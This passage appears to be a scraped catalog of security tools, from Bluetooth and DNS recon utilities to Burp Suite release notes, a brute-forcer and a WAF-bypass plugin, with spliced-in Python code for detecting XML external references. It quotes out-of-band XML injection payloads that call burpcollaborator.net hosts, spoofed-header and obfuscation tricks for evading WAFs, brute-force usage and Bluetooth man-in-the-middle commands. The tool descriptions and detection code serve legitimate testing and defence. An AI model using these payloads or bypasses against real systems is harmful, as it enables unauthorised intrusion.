Eterm to open tools somewhere; you can set another term in 'config/defaul.conf' by changing the value of the 'cmd_term' variable. (tested with 1.1 ver)
pkg-config (0.21), 'tee' used in tools/showmaxlocaldevinfo.sh, openobex, obexftp
libopenobex1 + libopenobex-dev (needed by ussp-push)
libxml2, libxml2-dev (needed by btftp)
libusb-dev (needed by bccmd)
libreadline5-dev (needed by atshell.c)
lightblue-0.3.3 (needed by obexstress.py)
hardware: any bluez compatible bluetooth-device

Download BlueMaho
BLUESCREENVIEW - BLUE SCREEN OF DEATH (STOP ERROR) INFORMATION IN DUMP FILES

BlueScreenView scans all your minidump files created during 'blue screen of death' crashes, and displays the information about all crashes in one table. For each crash, BlueScreenView displays the minidump filename, the date/time of the crash, the basic crash information displayed in the blue screen (Bug Check Code and 4 parameters), and the details of the driver or module that possibly caused the crash (filename, product name, file description, and file version).
For each crash displayed in the upper pane, you can view the details of the device drivers loaded during the crash in the lower pane. BlueScreenView also marks the drivers whose addresses were found in the crash stack, so you can easily locate the suspected drivers that possibly caused the crash.
Features

Automatically scans your current minidump folder and displays the list of all crash dumps, including crash dump date/time and crash details.
Allows you to view a blue screen which is very similar to the one that Windows displayed during the crash.
BlueScreenView enumerates the memory addresses inside the stack of the crash, and finds all drivers/modules that might be involved in the crash.
BlueScreenView also allows you to work with another instance of Windows, simply by choosing the right minidump folder (in Advanced Options).
BlueScreenView automatically locates the drivers that appear in the crash dump, and extracts their version resource information, including product name, file version, company, and file description.

Using BlueScreenView

BlueScreenView doesn't require any installation process or additional dll files. In order to start using it, simply run the executable file - BlueScreenView.exe
After running BlueScreenView, it automatically scans your MiniDump folder and displays all crash details in the upper pane.
Crashes Information Columns (Upper Pane)

Dump File: The MiniDump filename that stores the crash data.
Crash Time: The created time of the MiniDump file, which also matches the date/time that the crash occurred.
Bug Check String: The crash error string. This error string is determined according to the Bug Check Code, and it's also displayed in the blue screen window of Windows.
Bug Check Code: The bug check code, as displayed in the blue screen window.
Parameter 1/2/3/4: The 4 crash parameters that are also displayed in the blue screen of death.
Caused By Driver: The driver that probably caused this crash. BlueScreenView tries to locate the right driver or module that caused the blue screen by looking inside the crash stack. However, be aware that the driver detection mechanism is not 100% accurate, and you should also look in the lower pane, which displays all drivers/modules found in the stack. These drivers/modules are marked in pink color.
Caused By Address: Similar to the 'Caused By Driver' column, but also displays the relative address of the crash.
File Description: The file description of the driver that probably caused this crash. This information is loaded from the version resource of the driver.
Product Name: The product name of the driver that probably caused this crash. This information is loaded from the version resource of the driver.
Company: The company name of the driver that probably caused this crash. This information is loaded from the version resource of the driver.
File Version: The file version of the driver that probably caused this crash. This information is loaded from the version resource of the driver.
Crash Address: The memory address at which the crash occurred (the address in the EIP/RIP processor register). In some crashes, this value might be identical to the 'Caused By Address' value, while in others, the crash address is different from the driver that caused the crash.
Stack Address 1 - 3: The last 3 addresses found in the call stack. Be aware that in some crashes, these values will be empty. Also, the stack addresses list is currently not supported for 64-bit crashes.

Drivers Information Columns (Lower Pane)

Filename: The driver/module filename
Address In Stack: The memory address of this driver that was found in the stack.
From Address: First memory address of this driver.
To Address: Last memory address of this driver.
Size: Driver size in memory.
Time Stamp: Time stamp of this driver.
Time String: Time stamp of this driver, displayed in date/time format.
Product Name: Product name of this driver, loaded from the version resource of the driver.
File Description: File description of this driver, loaded from the version resource of the driver.
File Version: File version of this driver, loaded from the version resource of the driver.
Company: Company name of this driver, loaded from the version resource of the driver.
Full Path: Full path of the driver filename.

Lower Pane Modes

Currently, the lower pane has 4 different display modes. You can change the display mode of the lower pane from the Options > Lower Pane Mode menu.
1. All Drivers: Displays all the drivers that were loaded during the crash that you selected in the upper pane. The drivers/modules whose memory addresses were found in the stack are marked in pink color.
2. Only Drivers Found In Stack: Displays only the modules/drivers whose memory addresses were found in the stack of the crash. There is a very high chance that one of the drivers in this list is the one that caused the crash.
3. Blue Screen in XP Style: Displays a blue screen that looks very similar to the one that Windows displayed during the crash.
4. DumpChk Output: Displays the output of the Microsoft DumpChk utility. This mode only works when Microsoft DumpChk is installed on your computer and BlueScreenView is configured to run it from the right folder (in the Advanced Options window).
Command-Line Options

/LoadFrom <Source>: Specifies the source to load from.
  1 -> Load from a single MiniDump folder (/MiniDumpFolder parameter)
  2 -> Load from all computers specified in the computer list file. (/ComputersFile parameter)
  3 -> Load from a single MiniDump file (/SingleDumpFile parameter)
/MiniDumpFolder <Folder>: Start BlueScreenView with the specified MiniDump folder.
/SingleDumpFile <Filename>: Start BlueScreenView with the specified MiniDump file. (For using with /LoadFrom 3)
/ComputersFile <Filename>: Specifies the computers list filename. (When LoadFrom = 2)
/LowerPaneMode <1 - 3>: Start BlueScreenView with the specified mode. 1 = All Drivers, 2 = Only Drivers Found In Stack, 3 = Blue Screen in XP Style.
/stext <Filename>: Save the list of blue screen crashes into a regular text file.
/stab <Filename>: Save the list of blue screen crashes into a tab-delimited text file.
/scomma <Filename>: Save the list of blue screen crashes into a comma-delimited text file (csv).
/stabular <Filename>: Save the list of blue screen crashes into a tabular text file.
/shtml <Filename>: Save the list of blue screen crashes into an HTML file (Horizontal).
/sverhtml <Filename>: Save the list of blue screen crashes into an HTML file (Vertical).
/sxml <Filename>: Save the list of blue screen crashes into an XML file.
/sort <column>: This command-line option can be used with other save options for sorting by the desired column. If you don't specify this option, the list is sorted according to the last sort that you made from the user interface. The <column> parameter can specify the column index (0 for the first column, 1 for the second column, and so on) or the name of the column, like "Bug Check Code" and "Crash Time". You can specify the '~' prefix character (e.g. "~Crash Time") if you want to sort in descending order. You can put multiple /sort in the command-line if you want to sort by multiple columns. Examples:
  BlueScreenView.exe /shtml "f:\temp\crashes.html" /sort 2 /sort ~1
  BlueScreenView.exe /shtml "f:\temp\crashes.html" /sort "Bug Check String" /sort "~Crash Time"
/nosort: When you specify this command-line option, the list will be saved without any sorting.

Download BlueScreenView
BLUTO - DNS RECON, DNS ZONE TRANSFER, AND EMAIL ENUMERATION

BLUTO: DNS recon | Brute forcer | DNS Zone Transfer | Email Enumeration
The target domain is queried for MX and NS records. Subdomains are passively gathered via NetCraft. The target domain NS records are each queried for potential Zone Transfers. If none of them gives up their spinach, Bluto will brute force subdomains using parallel sub processing on the top 20000 of the 'The Alexa Top 1 Million subdomains'. NetCraft results are presented individually and are then compared to the brute force results; any duplications are removed and particularly interesting results are highlighted.
Bluto now does email address enumeration based on the target domain, currently using the Bing and Google search engines. It is configured to use a random User-Agent on each request and does a country lookup to select the fastest Google server in relation to your egress address. Each request closes the connection in an attempt to further avoid captchas; however, excessive lookups will result in captchas (Bluto will warn you if any are identified).
Bluto requires various other dependencies. So to make things as easy as possible, pip is used for the installation. This does mean you will need to have pip installed prior to attempting the Bluto install.
Pip Install Instructions

Note: To test if pip is already installed execute:
pip -V

(1) Mac and Kali users can simply use the following command to download and install pip.
curl https://bootstrap.pypa.io/get-pip.py -o - | python

Bluto Install Instructions

(1) Once pip has successfully downloaded and installed, we can install Bluto:
sudo pip install git+git://github.com/RandomStorm/Bluto

(2) You should now be able to execute 'bluto' from any working directory in any terminal.
bluto

Upgrade Instructions

(1) The upgrade process is as simple as:
sudo pip install git+git://github.com/RandomStorm/Bluto --upgrade

Download Bluto
BOHATEI - FLEXIBLE AND ELASTIC DDOS DEFENSE

Bohatei is a first of its kind platform that enables flexible and elastic DDoS defense using SDN and NFV.
The repository contains a first version of the components described in the Bohatei paper, as well as a web-based User Interface. The backend folder consists of:
an implementation of the FlowTags framework for the OpenDaylight controller
an implementation of the resource management algorithms
a topology file that was used to simulate an ISP topology
scripts that facilitate functions such as spawning, tearing down and retrieving the topology.
scripts that automate and coordinate the components required for the use cases examined.

The frontend folder contains the required files for the web interface.
For the experiments performed, we used a set of VM images that contain implementations of the strategy graphs for each type of attack (SYN Flood, UDP Flood, DNS Amplification and Elephant Flow). Those images will become available at a later stage. The tools that were used for those strategy graphs are the following:
Bro
Snort
Balancer
Iptables
Iperf
Custom scripts to simulate the attacks
Bohatei Paper
Bohatei Slides
Video

Download Bohatei
BRUTEX - AUTOMATICALLY BRUTE FORCE ALL SERVICES RUNNING ON A TARGET

Automatically brute force all services running on a target including:
Open ports
DNS domains
Web files
Web directories
Usernames
Passwords
USAGE
./brutex target

DEPENDENCIES

NMap
Hydra
Wfuzz
SNMPWalk
DNSDict

To brute force multiple hosts, use brutex-massscan and include the IPs/hostnames to scan in the targets.txt file.

Download BruteX
BTPROXY - MAN IN THE MIDDLE ANALYSIS TOOL FOR BLUETOOTH

Tested Devices
Pebble Steel smart watch
Moto 360 smart watch
OBDLink OBD-II Bluetooth Dongle
Withings Smart Baby Monitor
If you have tried anything else, please let me know at conorpp (at) vt (dot) edu.
Dependencies
Need at least 1 Bluetooth card (either USB or internal).
Need to be running Linux, another *nix, or OS X.
BlueZ 4
For a debian system, run
sudo apt-get install bluez bluez-utils bluez-tools libbluetooth-dev python-dev

Installation
sudo python setup.py install

Running
To run a simple MiTM or proxy on two devices, run
btproxy <master-bt-mac-address> <slave-bt-mac-address>

Run btproxy to get a list of command arguments.

Example
# This will connect to the slave 40:14:33:66:CC:FF device and
# wait for a connection from the master F1:64:F3:31:67:88 device
btproxy F1:64:F3:31:67:88 40:14:33:66:CC:FF

Where the master is typically the phone and the slave mac address is typically the other peripheral device (smart watch, headphones, keyboard, obd2 dongle, etc).
The master is the device that sends the connection request and the slave is the device listening for something to connect to it.
After the proxy connects to the slave device and the master connects to the proxy device, you will be able to see traffic and modify it.
How to find the BT MAC Address?
Well, you can usually look it up in the settings for a phone. The most robust way is to put the device in advertising mode and scan for it.
There are two ways to scan for devices: scanning and inquiring. hcitool can be used to do this:

hcitool scan
hcitool inq

To get a list of services on a device:

sdptool records <bt-address>

Usage
Some devices may restrict connecting based on the name, class, or address of another bluetooth device.
So the program will look up those three properties of the target devices to be proxied, and then clone them onto the proxying adapter(s).
Then it will first try connecting to the slave device from the cloned master adaptor. It will make a socket for each service hosted by the slave and relay traffic for each one independently.
After the slave is connected, the cloned slave adaptor will be set to be listening for a connection from the master. At this point, the real master device should connect to the adaptor.
After the master connects, the proxied connection is complete.
Using only one adapter
This program uses either 1 or 2 Bluetooth adapters. If you use one adapter, then only the slave device will be cloned. Both devices will be cloned if 2 adapters are used; this might be necessary for more restrictive Bluetooth devices.
Advanced Usage
Manipulation of the traffic can be handled via python by passing an inline script. Just implement the master_cb and slave_cb callback functions. These are called upon receiving data and the returned data is sent back out to the corresponding device.
# replace.py
from __future__ import print_function  # btproxy runs under Python 2; this keeps the script valid on 3 as well


def master_cb(req):
    """
    Received something from master, about to be sent to slave.
    """
    print('<< ', repr(req))
    # append the raw bytes to a log file, closing the handle after each write
    with open('mastermessages.log', 'a+b') as f:
        f.write(req)
    return req


def slave_cb(res):
    """
    Same as above but it's from slave, about to be sent to master.
    """
    print('>> ', repr(res))
    with open('slavemessages.log', 'a+b') as f:
        f.write(res)
    return res

Also see the example functions for manipulating Pebble watch traffic in replace.py
This code can be edited and reloaded during runtime by entering 'r' into the program console. This avoids the pains of reconnecting. Any errors will be caught and regular transmission will continue.
TODO
BLE
Improve the file logging of the traffic and make it more interactive for replays/manipulation.
Indicate which service is which in the output.
Provide control for disconnecting/connecting services.
PCAP file support
ncurses?
How it works
This program starts by killing the bluetoothd process, running it again with an LD_PRELOAD pointed to a wrapper for the bind system call to block bluetoothd from binding to L2CAP port 1 (SDP). All SDP traffic goes over L2CAP port 1 so this makes it easy to MiTM/forward between the two devices and we don't have to worry about mimicking the advertising.
The program first scans each device for their name and device class to make accurate clones. It will append the string '_btproxy' to each name to make them distinguishable from a user perspective. Alternatively, you can specify the names to use at the command line.
The program then scans the services of the slave device. It makes a socket connection to each service and opens a listening port for the master device to connect to. Once the master connects, the Proxy/MiTM is complete and output will be sent to STDOUT.
Notes
Some bluetooth devices have different methods of pairing which makes this process more complicated. Right now it supports SPP and legacy pin pairing.
This program doesn't yet have support for Bluetooth Low Energy. A similar approach to BLE can be taken.
Errors
btproxy or bluetoothd hangs
If you are using bluez 5, you should try uninstalling and installing bluez 4. I've had problems with bluez 5 hanging.
error accessing bluetooth device
Make sure the bluetooth adaptors are plugged in and enabled.
Run
# See the list of all adaptors
hciconfig -a
# Enable
sudo hciconfig hciX up
# if you get this message
Can't init device hci0: Operation not possible due to RF-kill (132)
# Then try unblocking it with the rfkill command
sudo rfkill unblock all

UserWarning: <path>/.python-eggs is writable by group/others
Fix
chmod g-rw,o-x <path>/.python-eggs

Download Btproxy
BURP SUITE PROFESSIONAL 1.6.26 - THE LEADING
TOOLKIT FOR WEB APPLICATION SECURITY TESTING

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.
Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.
Burp Suite contains the following key components:
An intercepting Proxy, which lets you inspect and modify
traffic between your browser and the target application.
An application-aware Spider, for crawling content and
functionality.
An advanced web application Scanner, for automating the
detection of numerous types of vulnerability.
An Intruder tool, for performing powerful customized
attacks to find and exploit unusual vulnerabilities.
A Repeater tool, for manipulating and resending individual
requests.
A Sequencer tool, for testing the randomness of session
tokens.
The ability to save your work and resume working later.
Extensibility, allowing you to easily write your own
plugins, to perform complex and highly customized tasks
within Burp.
Burp is easy to use and intuitive, allowing new users to begin
working right away. Burp is also highly configurable, and
contains numerous powerful features to assist the most
experienced testers with their work.
Release Notes v1.6.26

This release adds the ability to detect blind server-side XML/SOAP injection by triggering interactions with Burp Collaborator.
Previously, Burp Scanner has detected XML/SOAP injection by submitting some XML-breaking syntax like:
]]>>
and analyzing responses for any resulting error messages.
Burp now sends payloads like:
<nzf xmlns="http://a.b/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://a.b/ http://kuiqswhjt3era6olyl63pyd.burpcollaborator.net/nzf.xsd">nzf</nzf>
and reports an appropriate issue based on any observed interactions (DNS or HTTP) that reach the Burp Collaborator server.
Note that this type of technique is effective even when the original parameter value does not contain XML, and there is no indication within the request or response that XML/SOAP is being used on the server side.
The new scan check uses both schema location and XInclude to cause the server-side XML parser to interact with the Collaborator server.
In addition, when the original parameter value does contain XML being submitted by the client, Burp now also uses the schema location and XInclude techniques to try to induce external service interactions. (We believe that Burp is now aware of all available tricks for inducing a server-side XML parser to interact with an external network service. But we would be very happy to hear of any others that people know about.)
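An added detection example, not Burp's or PortSwigger's code: it scans an inbound XML body for the same vectors the release notes describe (schema location, XInclude, and external DTD/entity declarations) and reports the hosts a parser configured to resolve them would be steered to contact, which is what a server-side filter or a WAF log rule needs to flag. The schema-location sample is the payload quoted above; the XInclude and DTD samples and their .invalid hostnames are constructed for this example.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

XSI = "http://www.w3.org/2001/XMLSchema-instance"
XINCLUDE_TAGS = {"{%s}include" % ns for ns in
                 ("http://www.w3.org/2001/XInclude", "http://www.w3.org/2003/XInclude")}
NETWORK_SCHEMES = {"http", "https", "ftp"}

# External DTD or entity declarations in the prolog: <!DOCTYPE x SYSTEM "...">,
# <!ENTITY x SYSTEM "...">, <!ENTITY % x PUBLIC "id" "...">. ElementTree drops
# the DOCTYPE, so this part is matched textually (CDATA may yield a false
# positive, which is acceptable for a detection heuristic).
_QUOTED = r"""(?:"[^"]*"|'[^']*')"""
_DTD_REF = re.compile(
    r"<!(?:DOCTYPE|ENTITY)\s+(?:%\s+)?\S+\s+"
    r"(?:SYSTEM\s+(?P<sys>" + _QUOTED + r")"
    r"|PUBLIC\s+" + _QUOTED + r"\s+(?P<pub>" + _QUOTED + r"))",
    re.IGNORECASE,
)


def find_external_references(xml_text):
    """Return (kind, uri) pairs for every place this document asks the parser
    to fetch something: external DTD/entities, xsi:schemaLocation,
    xsi:noNamespaceSchemaLocation and XInclude hrefs."""
    findings = []
    for m in _DTD_REF.finditer(xml_text):
        findings.append(("dtd", (m.group("sys") or m.group("pub"))[1:-1]))
    try:
        root = ET.fromstring(xml_text)  # ElementTree does not fetch anything itself
    except ET.ParseError:
        return findings  # malformed input: the prolog scan is all we can offer
    for elem in root.iter():
        if elem.tag in XINCLUDE_TAGS:
            findings.append(("xinclude", elem.get("href", "")))
        schema_loc = elem.get("{%s}schemaLocation" % XSI)
        if schema_loc:
            # value is "namespace location namespace location ..."; locations are the odd tokens
            for loc in schema_loc.split()[1::2]:
                findings.append(("schemaLocation", loc))
        no_ns_loc = elem.get("{%s}noNamespaceSchemaLocation" % XSI)
        if no_ns_loc:
            findings.append(("noNamespaceSchemaLocation", no_ns_loc))
    return findings


def external_hosts(xml_text):
    """Hostnames the parser would be steered to contact over the network."""
    hosts = set()
    for _kind, uri in find_external_references(xml_text):
        parts = urlsplit(uri)
        if parts.scheme.lower() in NETWORK_SCHEMES and parts.hostname:
            hosts.add(parts.hostname)
    return hosts


def induces_outbound_interaction(xml_text):
    return bool(external_hosts(xml_text))


# Sample inputs. The first is the payload shape quoted in the release notes;
# the rest are constructed, with hostnames under the reserved .invalid TLD.
SCHEMA_LOCATION_PAYLOAD = (
    '<nzf xmlns="http://a.b/" '
    'xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" '
    'xsi:schemaLocation="http://a.b/ '
    'http://kuiqswhjt3era6olyl63pyd.burpcollaborator.net/nzf.xsd">nzf</nzf>'
)
XINCLUDE_PAYLOAD = (
    '<doc xmlns:xi="http://www.w3.org/2001/XInclude">'
    '<xi:include href="http://xinclude.example.invalid/x.txt" parse="text"/></doc>'
)
DTD_PAYLOAD = (
    '<!DOCTYPE foo [<!ENTITY ext SYSTEM "http://dtd.example.invalid/e.dtd">]>'
    '<foo>hello</foo>'
)
BENIGN = '<order><item sku="42">1</item></order>'

if __name__ == "__main__":
    for name, doc in [("schemaLocation", SCHEMA_LOCATION_PAYLOAD), ("xinclude", XINCLUDE_PAYLOAD),
                      ("dtd", DTD_PAYLOAD), ("benign", BENIGN)]:
        print(name, sorted(external_hosts(doc)))
```

Detection of this kind complements, rather than replaces, a parser configured not to resolve external resources at all, which is what closes the vector the release notes describe.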

Download Burp Suite Professional 1.6.26

BURP SUITE PROFESSIONAL V1.6.16 - THE LEADING TOOLKIT FOR WEB APPLICATION SECURITY TESTING

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.
Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.
Burp Suite contains the following key components:
An intercepting Proxy, which lets you inspect and modify
traffic between your browser and the target application.
An application-aware Spider, for crawling content and
functionality.
An advanced web application Scanner, for automating the
detection of numerous types of vulnerability.
An Intruder tool, for performing powerful customized
attacks to find and exploit unusual vulnerabilities.
A Repeater tool, for manipulating and resending individual
requests.
A Sequencer tool, for testing the randomness of session
tokens.
The ability to save your work and resume working later.
Extensibility, allowing you to easily write your own
plugins, to perform complex and highly customized tasks
within Burp.
Burp is easy to use and intuitive, allowing new users to begin
working right away. Burp is also highly configurable, and
contains numerous powerful features to assist the most
experienced testers with their work.
Release Notes

v1.6.15

This release introduces a brand new feature: Burp Collaborator.

Burp Collaborator is an external service that Burp can use to help discover many kinds of vulnerabilities, and has the potential to revolutionize web security testing. In the coming months, we will be adding many exciting new capabilities to Burp, based on the Collaborator technology.

Read today's blog post: Introducing Burp Collaborator
Read the full Burp Collaborator documentation

This release is officially beta due to the introduction of some new types of Scanner checks, and the reliance on a new service infrastructure. However, we have tested the new capabilities thoroughly and are not aware of any stability issues.

v1.6.16

This release fixes some issues with yesterday's beta release of the new Burp Collaborator feature, including a bug that may cause Burp to sometimes send some Collaborator-related test payloads even if the user has disabled use of the Collaborator feature.

This release is still officially beta while we monitor the Burp Collaborator capabilities for any further issues.

Download Burp Suite Professional


BURP SUITE PROFESSIONAL V1.6.23 - THE LEADING TOOLKIT FOR WEB APPLICATION SECURITY TESTING

Release Notes

v1.6.23

This release adds a new scan check for external service interaction and out-of-band resource load via injected XML doctype tags containing parameter entities. Burp now sends payloads like:

<?xml version='1.0' standalone='no'?><!DOCTYPE foo [<!ENTITY % f5a30 SYSTEM "http://u1w9aaozql7z31394loost.burpcollaborator.net"> %f5a30; ]>

and reports an appropriate issue based on any observed interactions (DNS or HTTP) that reach the Burp Collaborator server.
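The three constructs the two release notes above describe (DOCTYPE parameter entities, xsi:schemaLocation and XInclude) are easy to overlook in captured traffic. The following Python helper is an added example, not code from Burp Suite or from the original page: it pulls every external reference out of an XML request body and flags hosts outside an allow-list, so Collaborator-style probes can be triaged from WAF or access logs. The two Collaborator hostnames are the ones printed in the release notes; the XInclude body, the benign document and the allow-list are constructed for the example.

```python
"""Triage helper for XML request bodies that point a parser at the network.

Added example, not part of Burp Suite or of the original page.  It pulls
out the three constructs the release notes describe (DOCTYPE
external/parameter entities, xsi:schemaLocation and XInclude) and flags
any that reference a host outside an allow-list.  Regex triage is a
review aid only; the fix on the server is a parser that does not resolve
external resources at all.
"""
import re
from urllib.parse import urlsplit

# Hosts the application is allowed to fetch schemas or includes from.
# Constructed for this example; real deployments maintain their own list.
ALLOWED_HOSTS = {"schemas.example.internal"}

_QUOTED = r"""["']\s*([^"']*)["']"""

# Each pattern captures the referenced location in group 1.
_PATTERNS = {
    # <!ENTITY xxe SYSTEM "..."> and parameter entities <!ENTITY % p SYSTEM "...">
    "external-entity": re.compile(
        r'<!ENTITY\s+%?\s*[\w.-]+\s+(?:SYSTEM|PUBLIC\s+"[^"]*")\s*' + _QUOTED,
        re.IGNORECASE | re.DOTALL),
    # <!DOCTYPE root SYSTEM "..."> (external DTD subset)
    "external-dtd": re.compile(
        r'<!DOCTYPE\s+[\w.-]+\s+(?:SYSTEM|PUBLIC\s+"[^"]*")\s*' + _QUOTED,
        re.IGNORECASE | re.DOTALL),
    # xsi:schemaLocation="ns1 url1 ns2 url2 ..." (only the urls are fetched)
    "schema-location": re.compile(
        r'\b(?:[\w-]+:)?schemaLocation\s*=\s*' + _QUOTED,
        re.IGNORECASE | re.DOTALL),
    # xsi:noNamespaceSchemaLocation="url ..."
    "no-namespace-schema-location": re.compile(
        r'\b(?:[\w-]+:)?noNamespaceSchemaLocation\s*=\s*' + _QUOTED,
        re.IGNORECASE | re.DOTALL),
    # <xi:include href="..."/>
    "xinclude": re.compile(
        r'<(?:[\w-]+:)?include\b[^>]*?\bhref\s*=\s*' + _QUOTED,
        re.IGNORECASE | re.DOTALL),
}


def _locations(kind, value):
    """Turn a captured attribute/identifier value into the URL(s) it names."""
    if kind == "schema-location":
        return value.split()[1::2]          # namespace/location pairs
    if kind == "no-namespace-schema-location":
        return value.split()
    return [re.sub(r"\s+", "", value)]      # tolerate line-wrapped captures


def extract_external_references(body):
    """Return [(kind, url), ...] in document order for every resource the
    document would make a resolving parser fetch.  Namespace URIs (xmlns)
    are deliberately not reported: parsers do not dereference them."""
    hits = []
    for kind, pattern in _PATTERNS.items():
        for m in pattern.finditer(body):
            for url in _locations(kind, m.group(1)):
                hits.append((m.start(), kind, url))
    return [(kind, url) for _, kind, url in sorted(hits)]


def suspicious_references(body, allowed_hosts=ALLOWED_HOSTS):
    """References whose host is not allow-listed.  Locations without a host
    (relative paths, file: URLs) are reported too: they resolve on the
    server itself rather than out of band."""
    findings = []
    for kind, url in extract_external_references(body):
        host = (urlsplit(url).hostname or "").lower()
        if host and host in allowed_hosts:
            continue
        findings.append({"kind": kind, "url": url, "host": host})
    return findings


# The two payloads quoted in the release notes; the Collaborator hostnames
# are the ones printed on the page.
SCHEMA_LOCATION_PROBE = (
    '<nzf xmlns="http://a.b/" '
    'xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" '
    'xsi:schemaLocation="http://a.b/ '
    'http://kuiqswhjt3era6olyl63pyd.burpcollaborator.net/nzf.xsd">nzf</nzf>'
)
PARAMETER_ENTITY_PROBE = (
    "<?xml version='1.0' standalone='no'?><!DOCTYPE foo [<!ENTITY % f5a30 "
    'SYSTEM "http://u1w9aaozql7z31394loost.burpcollaborator.net"> %f5a30; ]>'
)
# Constructed for this example: an XInclude probe and a benign document
# whose only external reference is an allow-listed schema.
XINCLUDE_PROBE = (
    '<doc xmlns:xi="http://www.w3.org/2001/XInclude">'
    '<xi:include href="http://probe.example.net/x" parse="text"/></doc>'
)
BENIGN_ORDER = (
    '<order xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" '
    'xsi:noNamespaceSchemaLocation="https://schemas.example.internal/order.xsd">'
    '<id>1</id></order>'
)

if __name__ == "__main__":
    for name, body in [("schemaLocation", SCHEMA_LOCATION_PROBE),
                       ("parameter entity", PARAMETER_ENTITY_PROBE),
                       ("XInclude", XINCLUDE_PROBE),
                       ("benign", BENIGN_ORDER)]:
        print(name, "->", suspicious_references(body) or "clean")
```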

The release also fixes some issues:

Some bugs affecting the saving and restoring of Burp state files.
A bug in the Collaborator server where the auto-generated self-signed certificate does not use a wildcard prefix in the CN. This issue only affects private Collaborator server deployments where a custom SSL certificate has not been configured.

Download Burp Suite Professional v1.6.23


BURPKIT - NEXT-GEN BURPSUITE PENETRATION TESTING TOOL

Welcome to the next generation of web application penetration testing - using WebKit to own the web. BurpKit is a BurpSuite plugin which helps in assessing complex web apps that render the contents of their pages dynamically. It also provides a bidirectional JavaScript bridge API which allows users to create quick one-off BurpSuite plugin prototypes which can interact directly with the DOM and Burp's extender API.

System Requirements

BurpKit has the following system requirements:

Oracle JDK >=8u50 and <9 (Download)
At least 4GB of RAM

Installation

Installing BurpKit is simple:

1. Download the latest prebuilt release from the GitHub releases page.
2. Open BurpSuite and navigate to the Extender tab.
3. Under Burp Extensions click the Add button.
4. In the Load Burp Extension dialog, make sure that Extension Type is set to Java and click the Select file ... button under Extension Details.
5. Select the BurpKit-<version>.jar file and click Next when done.

If all goes well, you will see three additional top-level tabs appear in BurpSuite:

1. BurpKitty: a courtesy browser for navigating the web within BurpSuite.
2. BurpScript IDE: a lightweight integrated development environment for writing JavaScript-based BurpSuite plugins and other things.
3. Jython: an integrated python interpreter console and lightweight script text editor.

BurpScript

BurpScript enables users to write desktop-based JavaScript applications as well as BurpSuite extensions using the JavaScript scripting language. This is achieved by injecting two new objects by default into the DOM on page load:

1. burpKit: provides numerous features including file system I/O support and easy JS library injection.
2. burpCallbacks: the JavaScript equivalent of the IBurpExtenderCallbacks interface in Java with a few slight modifications.

Take a look at the examples folder for more information.

More Information?

A readable version of the docs can be found here.

Download BurpKit
BWA - OWASP BROKEN WEB APPLICATIONS PROJECT

A collection of vulnerable web applications that is distributed on a Virtual Machine.

Description

The Broken Web Applications (BWA) Project produces a Virtual Machine running a variety of applications with known vulnerabilities for those interested in:

learning about web application security
testing manual assessment techniques
testing automated tools
testing source code analysis tools
observing web attacks
testing WAFs and similar code technologies

All the while saving people interested in doing either learning or testing the pain of having to compile, configure, and catalog all of the things normally involved in doing this process from scratch.

Download OWASP Broken Web Applications Project


BYPASSWAF - BURP PLUGIN TO BYPASS SOME WAF DEVICES

Add headers to all Burp requests to bypass some WAF products. This extension will automatically add the following headers to all requests.

X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1

Usage

Steps include:

1. Add extension to burp
2. Create a session handling rule in Burp that invokes this extension
3. Modify the scope to include applicable tools and URLs
4. Configure the bypass options on the "Bypass WAF" tab
5. Test away

Read more here.

Features

All of the features are based on Jason Haddix's work found here, and Ivan Ristic's WAF bypass work found here and here.

Bypass WAF contains the following features; a description of each follows:

1. Users can modify the X-Originating-IP, X-Forwarded-For, X-Remote-IP, X-Remote-Addr headers sent in each request. This is probably the top bypass technique in the tool. It isn't unusual for a WAF to be configured to trust itself (127.0.0.1) or an upstream proxy device, which is what this bypass targets.
2. The "Content-Type" header can remain unchanged in each request, removed from all requests, or be modified to one of the many other options for each request. Some WAFs will only decode/evaluate requests based on known content types; this feature targets that weakness.
3. The "Host" header can also be modified. Poorly configured WAFs might be configured to only evaluate requests based on the correct FQDN of the host found in this header, which is what this bypass targets.
4. The request type option allows the Burp user to only use the remaining bypass techniques on the given request method of "GET" or "POST", or to apply them on all requests.
5. The path injection feature can leave a request unmodified, inject random path info information (/path/to/example.php/randomvalue?restofquery), or inject a random path parameter (/path/to/example.php;randomparam=randomvalue?restofquery). This can be used to bypass poorly written rules that rely on path information.
6. The path obfuscation feature modifies the last forward slash in the path to a random value, or by default does nothing. The last slash can be modified to one of many values that in many cases results in a still valid request but can bypass poorly written WAF rules that rely on path information.
7. The parameter obfuscation feature is language specific. PHP will discard a + at the beginning of each parameter, but a poorly written WAF rule might be written for specific parameter names, thus ignoring parameters with a + at the beginning. Similarly, ASP discards a % at the beginning of each parameter.
8. The "Set Configuration" button activates all the settings that you have chosen.

All of these features can be combined to provide multiple bypass options.
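Feature 1 works only because a WAF or front end believes client-address headers it never set itself. The following Python example is added here and is not part of the Bypass WAF extension: it places the weak resolver (trust whatever X-Forwarded-For or X-Originating-IP says) beside the corrected one (believe only hops appended by known proxies) and evaluates a "do not inspect traffic from 127.0.0.1" rule with each. The proxy network, peer address and request headers are constructed for the example.

```python
"""Client-address handling a WAF or front end should use.

Added example, not part of the Bypass WAF extension.  naive_client_ip is
the misconfiguration feature 1 targets: it trusts client-address headers,
so the 127.0.0.1 values the extension injects make the request look like
the WAF itself.  client_ip_from_trusted_chain only believes X-Forwarded-For
hops that our own proxies appended.  Proxy ranges and addresses are
constructed for the example.
"""
import ipaddress

# Headers no proxy in our chain sets; a WAF must never derive trust from them.
CLIENT_CONTROLLED_HEADERS = ("X-Originating-IP", "X-Remote-IP", "X-Remote-Addr")

# Networks of the reverse proxies that sit in front of the WAF (constructed).
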